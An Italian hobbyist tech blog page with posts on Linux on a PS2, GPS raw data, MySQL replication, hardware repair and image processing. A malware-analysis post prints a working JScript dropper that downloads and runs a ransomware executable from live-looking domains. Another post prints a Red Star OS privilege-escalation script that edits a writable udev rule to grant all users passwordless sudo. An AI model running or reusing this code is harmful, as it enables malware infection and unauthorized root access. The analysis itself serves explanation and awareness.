lunedì 8 febbraio 2016

Linux su PS2

Correva l'anno 2002 (lavoravo ancora come tecnico informatico all'universita') quando usci la notizia che era possibile comprare un dev kit per modificare la PS2 per utilizzare Linux. La curiosita' per me era tanta ma il prezzo non trascurabile di una PS2 e la pessima distribuzione del kit (sostanzialmente Giappone e USA) hanno contribuito a non farmi mai provare la PS2 come computer

Gimp in PS2 Linux

Di recente mi e' stata regalata una PS2 slim e non ho potuto esimermi dal provare Black Rhino, una distribuzione live DVD per Linux PS2 (questo e' un approccio molto differente dal Dev Kit per il quale era previsto una espansione con hard disk ed un connettore VGA ma si deve precisare che il DevKit era fatto esclusivamente per la PS2 prima generazione "Fat PS2" e non compatibile con la mia Slim PS2)

Dato che la mia PS2 non ha il modchip ed e' PAL ho scaricato il file ps2linux_live_v3_pal_large_no_modchip.7z

Per prima cosa bisogna avere una scheda di memoria di espansione di PS2 con installato Free MCBoot. Agli inizi del 2000 era piuttosto comune trovarla ed avendone una si poteva replicare su schede vuote. Oggi invece e' introvabile e sono riuscito a reperirne una su un e-commerce cinese al prezzo di circa 7 euro




Inserita l'espansione di memoria si accende la PS2 lasciando lo sportellino del CDRom aperto (altrimenti parte il disco all'interno)  e si accede al menu dell'immagine soprastante. Si seleziona Free MCBoot e si arriva a questa schermata (si richiude lo sportellino)


Si preme cerchio sul joypad per andare avanti.
A questo punto si deve avere preparato una chiavetta USB con i  file
Kloader.elf
initrd.gz (il ramdisk)
vmlinux (il kernel)

si selezione il file Kloader.elf ed il sistema cerca di fare il boot automatico


peccato che si blocchi con questo errore


si deve caricare a mano il kernel ed il ramdisk riprendendoli dalla chiavetta USB


Si effettua il boot con i nuovi parametri e si vede partire il kernel
(qui ho dovuto provare a masterizzare 3 DVD perche' i primi due venivano visti con errori dalla PS2 mentre era leggibili per il PC, non so se si e' degradato il lettore della PS2 o gli restano antipatici i dischi masterizzati)


e qui c'e' una trappola che mi ha bloccato per un giorno intero. Il sistema mostra un errore di montaggio del filesystem sul DVD. Il primo istinto e' resettare e ripartire ma la soluzione giusta e' aspettare. Non si tratta di errore critico e basta aspettare . (Il boot completo richiede almeno 5 minuti!!!)

Una volta giunto X ci si trova davanti a Fluxbox con alcune applicazioni preinstallate


ci si deve pero' ricordare che l'hardware ha appena 32 Mb di ram disponibile quindi il live DVD sara' estremamente lento anche perche' non c'e' partizione di swap (con un po' di pazienza si puo' attaccare un disco esterno usb e configurarlo per il sistema operativo ma cio' va al di la' di quanto volevo provare)


Togliendo la chiavetta ed inserendo mouse e tastiera ci si trova di fronte ad una PS2 convertito in un PC (lentissimo) con cui si puo' giocare con GIMP 1.2

venerdì 5 febbraio 2016

Raw data da Ublox M8T

Per migliorare il mio sistema GPS portatile ho deciso che le antenne a basso costo non raggiungono i risultati attesi e mi sono comprato un UBlox M8T che, pur essendo ancora un dispositivo L1, permette di ottenere i dati raw della fase

Il costo del dispositivo, compreso di antenna e' sui 100 euro (in particolare ho comprato questo modello)


Diametro circa 10 cm

L'interfaccia con il software U-Center funziona perfettamente senza l'installazione dei driver (peraltro il dispositivo e' giunto senza nessuna indicazione ne' scritta ne' su supporto informatico) via Usb anche se e' disponibile una serie TTL per l'uso con Arduino.

Una volta lanciato il programma si deve collegare la seriale premendo il primo pulsante a sinistra nella seconda toolbar (dal menu a tendina si deve prima  scegliere la COM)

A questo punto inizia il collegamento. Di default il GPS spedisce dati NMEA. Per abilitare la trasmissione dei pacchetti binari UBX, dove sono contenute le informazioni si deve cliccare sul quarto pulsante da sinistra (si vedra' una finestra Enable con una progressbar ed i messaggi che abilitano l'UBX)



Con il tasto F6 si apre la finestra di visualizzazione dei pacchetti ricevuti (Packet Console) mentre con F7 si vede il dettaglio del contenuto del pacchetto (ovviamente essendo i pacchetti UBX binari sara' poco chiaro il significato)

In questo momento sono mischiati i pacchetti binari UBX ed i pacchetti NMEA (stringhe). Per vedere solo i dati UBX si clicca F9  (Message View), poi si clicca destra sulla radice NMEA e Disable Child Message.
I pacchetti dei dati raw sono inclusi nel pacchetto UBX-RXM-RAWX

Esempio dei pacchetti UBX

Da dentro U-Center si puo' attivare la registrazione dei dati su file mediante il pulsante Save (il cerchio rosso nella seconda toolbar)

A questo punto si deve passare, per il postprocessing,  dal formato UBX a Rinex. Per fare cio' si deve usare il programma RTKLib  facendo attenzione ad utilizzare la versione beta 2.4.3 (scaricabile da qui) perche' le precedenti versioni stable non leggono l'attuale formato UBX.
La conversione si fare a riga di comando con convbin.exe oppure con la GUI mediante rtkconv.exe



il risultato finale in Rinex e' il seguente
-----------------------------------------------
     2.10           OBSERVATION DATA    M (MIXED)           RINEX VERSION / TYPE
RTKCONV 2.4.3 b8                        20160204 132837 UTC PGM / RUN BY / DATE 
log: C:\Documents and Settings\l.innocenti\Desktop\rtkli\b  COMMENT             
format: u-blox                                              COMMENT             
                                                            MARKER NAME         
                                                            MARKER NUMBER       
                                                            OBSERVER / AGENCY   
                                                            REC # / TYPE / VERS 
                                                            ANT # / TYPE        
  4523854.9454   898262.0665  4390882.1912                  APPROX POSITION XYZ 
        0.0000        0.0000        0.0000                  ANTENNA: DELTA H/E/N
     1     1                                                WAVELENGTH FACT L1/2
     4    C1    L1    D1    S1                              # / TYPES OF OBSERV 
  2016     2     4    10    46   37.0000000     GPS         TIME OF FIRST OBS   
  2016     2     4    11     2   34.0000000     GPS         TIME OF LAST OBS    
                                                            END OF HEADER       
 16  2  4 10 46 37.0000000  0  6G 9G 6G23G 2G 3G16
  20353149.445       31374.2421       -629.648          48.250  
  21171326.688      101805.5401      -2189.004          42.000  
  21715976.480      221495.1331      -4711.816          50.750  
  22754433.179     -230913.3121       5015.303          39.500  
  23778302.177      352639.2231      -7537.764          42.000  
  24278781.122      -34942.1271       2639.141          29.250  



mercoledì 3 febbraio 2016

W32 Ramsonware 93.exe

Ieri frugando nello spam di GMail ho trovato un messaggio proveniente da un mio parente con l'indicazione di un rischio legato al file in allegato denominato Jgw.zip.

La prima cosa curiosa guardando l'header della mail e' che l'indirizzo corrisponde a quella del mio parente solo nella username e non del dominio (che risulta essere biscuitmusic.com, un sito giapponese, al posto di libero.it)

--------------------------------
Delivered-To: lucxxxxxx@gmail.com
Received: by 10.28.60.11 with SMTP id j11csp1824576wma;
        Sat, 30 Jan 2016 14:51:08 -0800 (PST)
X-Received: by 10.50.131.201 with SMTP id oo9mr3891354igb.68.1454194268656;
        Sat, 30 Jan 2016 14:51:08 -0800 (PST)
Return-Path: <xxxxx@biscuitmusic.com>
Received: from smtp310.phy.lolipop.jp (smtp310.phy.lolipop.jp. [210.157.22.78])
        by mx.google.com with ESMTP id jn5si5379918igb.40.2016.01.30.14.51.07;
        Sat, 30 Jan 2016 14:51:08 -0800 (PST)
Received-SPF: neutral (google.com: 210.157.22.78 is neither permitted nor denied by best guess record for domain of xxxxxxxx@biscuitmusic.com) client-ip=210.157.22.78;
Authentication-Results: mx.google.com;
       spf=neutral (google.com: 210.157.22.78 is neither permitted nor denied by best guess record for domain of xxxxxxx@biscuitmusic.com) smtp.mailfrom=xxxxxxx@biscuitmusic.com
Received: from smtp310.phy.lolipop.lan (HELO smtp310.phy.lolipop.jp) (172.17.1.10)
  (smtp-auth username sato@biscuitmusic.com, mechanism plain)
  by smtp310.phy.lolipop.jp (qpsmtpd/0.82) with ESMTPA; Sun, 31 Jan 2016 07:51:07 +0900
Received: from 186.64.232.94 (186.64.232.94)
 by smtp310.phy.lolipop.jp (LOLIPOP-Fsecure);
 Sun, 31 Jan 2016 07:50:48 +0900 (JST)
X-Spam-Status: Yes(LOLIPOP-Fsecure) with VIRUSGW/SPAM_RBL/186.64.232.94[bl.spamcop.net:127.0.0.2]
X-Virus-Status: clean(LOLIPOP-Fsecure)
Message-ID: <9753AAE9DA198CA1FC6E4AB2E048A630@smtp.lolipop.jp>
From: "xxxxxxx" <xxxxxxx@biscuitmusic.com>
To: xxxxxxxxxxxxxxxxxxxxxxxxxxxx
Subject: =?ISO-8859-1?Q?1=2F20=2F2016_11=3A49=3A25_PM?=
Date: Tue, 20 Jan 2016 11:49:25 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="----=_NextPart_000_F7A3_CF9742FB.005289E3"
X-Priority: 3
X-MSMail-Priority: Normal
Importance: Normal
X-Mailer: Microsoft Windows Live Mail 16.4.3522.110
X-MIMEOLE: Produced By Microsoft MimeOLE V16.4.3522.110

This is a multi-part message in MIME format.

------=_NextPart_000_F7A3_CF9742FB.005289E3
Content-Type: multipart/alternative;
 boundary="----=_NextPart_000_3DE5_CF97430A.5525FFAB"

------=_NextPart_000_3DE5_CF97430A.5525FFAB
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
--------------------------------

E' scattata subito la curiosita' di capire cosa fosse e sono passato sotto Linux per evitare sorprese con qualche virus
Una volta decompresso il file zip vi era contenuto il file invoice_copy_JJBtlo.js. Aprendo con un editore e' apparso subito che si tratta di un sistema per scaricare il file http://skuawill.com/93.exe sulla macchina locale e mandarlo in esecuzione
(ATTENZIONE : alle 23.00 del 2 febbraio 2016 questo indirizzo era ancora attivo era possibile scaricare l'eseguibile del file)

in pratica il file Js e' uno script di shell di Windows che scarica il file e lo mette in TMP e lo nomina come 35184372088832 che corrisponde al 2 elevato alla 45
--------------------------------
var STATUS_OK = 200;
var METHOD_GET = "GET";
var METHOD_EXEC = "Exec";
var W_SCRIPT_SHELL = "WScript.Shell";
var MSXML2_XMLHTTP = "MSXML2.XMLHTTP";
var ADODB = "ADODB";
var STREAM = "Stream";
var TEMP_ENV = "%TEMP%\\";
var EXE_EXTENSION = ".exe";
var MIN_FILE_SIZE = 20000;

var URLS = ["http://skuawill.com/93.exe","http://skuawillbil.com/93.exe"];
var FILE_NAME = 35184372088832;


var wShell = WScript.CreateObject(W_SCRIPT_SHELL);
var httpRequest = WScript.CreateObject(MSXML2_XMLHTTP);
var stream = WScript.CreateObject(ADODB+"."+STREAM);

var tmpDir = wShell.ExpandEnvironmentStrings(TEMP_ENV);
var storedFilePathName = tmpDir + FILE_NAME + EXE_EXTENSION;


for (var v = 0; v < URLS.length; v++) {
    try {
        var url = URLS[v];
        httpRequest.open(METHOD_GET, url, false);
        httpRequest.send();
        if (httpRequest.status == STATUS_OK) {
            try {
                stream.open();
                stream.type = 1;
                stream.write(httpRequest.responseBody);
                if (stream.size > MIN_FILE_SIZE) {
                    v = URLS.length;
                    stream.position = 0;
                    stream.saveToFile(storedFilePathName, 2);
                }
            } finally {
                stream.close();
            }
        }
    }
    catch (ignored) {
    }
}
wShell[METHOD_EXEC](tmpDir + Math.pow(2, 45));
--------------------------------
Passando il file exe in un editor esadecimale si vede che e' un file EXE di Windows (l'intestazione e' correttamente MZ quindi nessun pericolo a giocare con Mac e Linux), ha una dimensione di 508 Kb e frugando tra le stringhe si trova qualcosa di leggibile solo in coda al file (dalla posizione 494784 in poi)  ma una ricerca su Google delle stringhe non porta da nessuna parte di precisa

Aggiornamento : e' presente il riferimento ad un linguaggio di scripting denominato Edify per modificare file binari (fare l'update) partendo da un file .zip. Viene citato come in uso dalla catena di build di CyanogenMod. Ho il sospetto che il codice sia compresso e cio' nasconde le stringhe critiche

La cosa piu' preoccupante (oltre al fatto che il server non risulta filtrato e continua a distribuire il file 93.exe) e' che su VirusTotal il file viene riconosciuto come malware solo da 14 su 54 antivirus (in alcuni casi con un nome generico mentre su altri antivirus come Tesla)
In ogni caso c'e' abbastanza concordia nel dire che si tratti di un ramsonware o filelocker, un programma che cripta in maniera forte i dati della vittima e chiede un riscatto in bitcoin per ottenere la chiave crittografica di decompressione




martedì 2 febbraio 2016

Resync Mysql

In questo post avevo provato a fare il mirroring master/slave di un database Mysql su macchine differenti


Prova di mysql mirroring su macchine virtuali Debian in VMWare

In generale la sincronia dei dati anche se la macchina slave e' spenta od offline. Al momento di ristabilire la connessione lo slave e' in grado di stabilire le differenze tra le proprie tabelle e quelle del master per richiedere la differenza

In alcuni casi questa procedura puo' entrare in crisi ed e' necessario effettuare un resync manuale con la procedura indicata qui passando da un file dump dei dati del master

In pratica si procede stoppando lo slave

stop slave;

si blocca il master e si effettua il dump dei dati in modalita' lock

reset master;
flush tables with read lock;

si esce dalla shell di Mysql e si crea il dump dei dati

mysqldump -u root -p mirrdatabase > dump.sql

si rientra nella shell di Mysql e si sbloccano le tabelle

unlock tables;

a questo punto si copiano i dati sullo slave (che ha il mirroring bloccato)

mysql -u root -p mirrdatabase < dump.sql

(nello script dump.sql ci sono le informazioni per cancellare le tabelle precedentemente presenti per cui non e' necessario farlo a mano)

si riavvia il mirroring
reset slave;
change master to master_log_file='mysql-bin.000001', master_log_pos=1;start slave;


questa procedura puo' essere utile nel momento di creare un mirroring di una macchina gia' in produzione da diverso tempo con una grande quantita' di dati che potrebbero creare problemi in fase di sincronia sia alla CPU che al traffico di rete

lunedì 1 febbraio 2016

Sostituzione batteria su A1286

La sostituzione della batteria sui Mac e' diventata con il tempo sempre piu' difficile a partire dai vecchi MacBook bianchi (dove era banale e bastava una monetina) ad alcuni modelli attuali in cui e' sostanzialmente impossibile

Una delle cose da tenere in considerazione quando si tenta di riportare in vita (o meglio usabile) un vecchio Mac e' che Apple ha la maledetta abitudine si usare uno stesso identificativo per una serie di portatili con hardware molto differente. Per esempio con l'identificativo A1286 vengono definiti 22 modelli differenti di MacBook Pro con dotazione da Core 2 Duo ad I7


Quindi se si compra una batteria di ricambio genericamente per A1286 c'e' la possibilita' di sbagliare (infatti la dimensione della batteria e' la medesima ma cambia il connettore)

Per il MacBook Pro 15 pollici Mid 2009 si deve scegliere il ricambio A1302


Sorpassato il problema iniziale della scelta del giusto ricambio la sostituzione e' banale, ci si deve solo ricordare che non tutte le viti del fondo del computer sono tutte delle stessa dimensione (quelle piu' lunghe sono sul lato della cerniera del monitor). Un lavoro da 10 minuti e circa 30 euro di spesa

venerdì 29 gennaio 2016

Hacking Red Star 3.0

Red Star e' un sistema operativo basato su Linux, probabilmente da una Fedora, creato da governo della Nord Corea con l'evidente scopo di tracciare e limitare le attivita' online dei propri utenti,
La notizia della fuga della iso del sistema operativo e' piuttosto vecchiotta cosi' come il sistema per hackerare il sistema ma e' un ottimo esempio di come si puo', su un sistema solido come Linux, effettuare una scalata di privilegi con metodi banali (ovvero senza ricorrere a buffer overflow od exploit particolari) basandosi su una pessima configurazione del sistema

La iso puo' essere scaricata da questo link

Finestra di Login di RedStar

Attenzione : e' fortemente consigliato di giocare con RedStar soltanto all'interno di una macchina virtuale disconnettendo l'interfaccia di rete virtuale ed evitando qualsiasi tipo di condivisione con il filesystem reale o chiavette USB reali (Red Star effettua di nascosto un watermark di tutti i file che scansiona)

Il primo ostacolo che si incontra nella installazione della iso e' che e' tutta (ovviamente) in coreano quindi bisogna andare un po' a caso. Essendo comunque solo una traduzione e non una modifica del procedimento base e' piuttosto semplice concludere il processo

Schermata dell'installazione

A questo punto ho provato a raggiungere una shell. Usando le combinazioni di tasti CTRL+ALT+Fx si ha che su F1 si ha una shell testuale ma a cui non si puo' effettuare il login mentre su F2 si ha X, nessuna altra shell virtual


In realta' frugando nei menu si trova un Xterm. Si deve cliccare sull'icona in basso per aprire il menu dei programmi.


Poi cliccando sulla quarta icona da sinistra nella riga piu' in alto della finestra soprastante (icona del folder verde) si accede alla schermata sottostante


Si clicca sul folder con martello e chiave (che dovrebbe essere qualcosa tipo Utility) e si arriva finalmente all'icona del terminale


Una volta ottenuta la shell si ha il problema che digitando sulla tastiera compaiono caratteri coreani ed e' quindi impossibile digitare i comandi Unix. La soluzione e' quella di premere a lungo e rilasciare il tasto Alt-Gr, a questo punto dovrebbero comparire i caratteri latini e si puo' procedere

e qui inizia la vera e propria scalata dei privilegi
la debolezza del sistema risiede tutta nella cattiva configurazione dei permessi nel file /etv/udev/rules.d/85-hpjl10xx.rules che e' settato come 777
RedStar e' impostato per impedire l'esecuzione di file di sistema ed ovviamente l'utente normale non puo' utilizzare sudo. Pero' il file in esame viene eseguito in fase di boot come root/admin.
Il gioco sta semplicemente nel modificare il file (perche' e' comunque scrivibile) e riavviare il computer per eseguire i comandi aggiunti per prendere il controllo della macchina



lo script (trovato qui) e' il seguente
semplicemente vengono aggiunti tutti gli utenti alla lista sudoers .. di una semplicita' disarmante
---------------------------------------------
 #!/bin/bash -e
 cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak
 echo 'RUN+="/bin/bash /tmp/r00t.sh"' > /etc/udev/rules.d/85-hplj10xx.rules
 cat <<EOF >/tmp/r00t.sh
 echo -e "ALL\tALL=(ALL)\tNOPASSWD: ALL" >> /etc/sudoers
 mv /tmp/udevhp.bak /etc/udev/rules.d/85-hplj10xx.rules
 chown 0:0 /etc/udev/rules.d/85-hplj10xx.rules
 rm /tmp/r00t.sh
 EOF
 chmod +x /tmp/r00t.sh
 echo "sudo will be available after reboot"
 sleep 2
 reboot
---------------------------------------------







mercoledì 27 gennaio 2016

Normalizzazione immagini con ImageMagick

Per un software di elaborazione immagini, in particolare per calcolare gli spostamenti da un video in timelapse, avevo la necessita' di confrontare immagini con la stessa inquadratura ma con condizioni di luce differenti, possibilmente con procedura batch

Una soluzione e' stata trovata negli script a questo link http://www.fmwconcepts.com/imagemagick/, in particolare bcmatch

Le immagini di riferimento sono state riprese a 11 minuti di distanza all'alba. L'elaborazione ha tentato di riportare le condizioni di illuminazione di Immagine 2 a quelle di Immagine 1 (per confronto si puo' vedere la posizione della Luna nel cielo)

Il risultato non e' perfetto ma decisamente buono e conforme per quanto richiesto dal successivo software di elaborazione.
Immgine 1

Immagine 2

Immagine 2 normalizzata ad Immagine 1

La stessa cosa con le immagini pero' a scala di grigio

Immagine 1 scala grigio

Immagine 2 scala grigio


Immagine 2 normalizzata ad Immagine 1


Debugger integrato ESP32S3

Aggiornamento In realta' il Jtag USB funziona anche sui moduli cinesi Il problema risiede  nell'ID USB della porta Jtag. Nel modulo...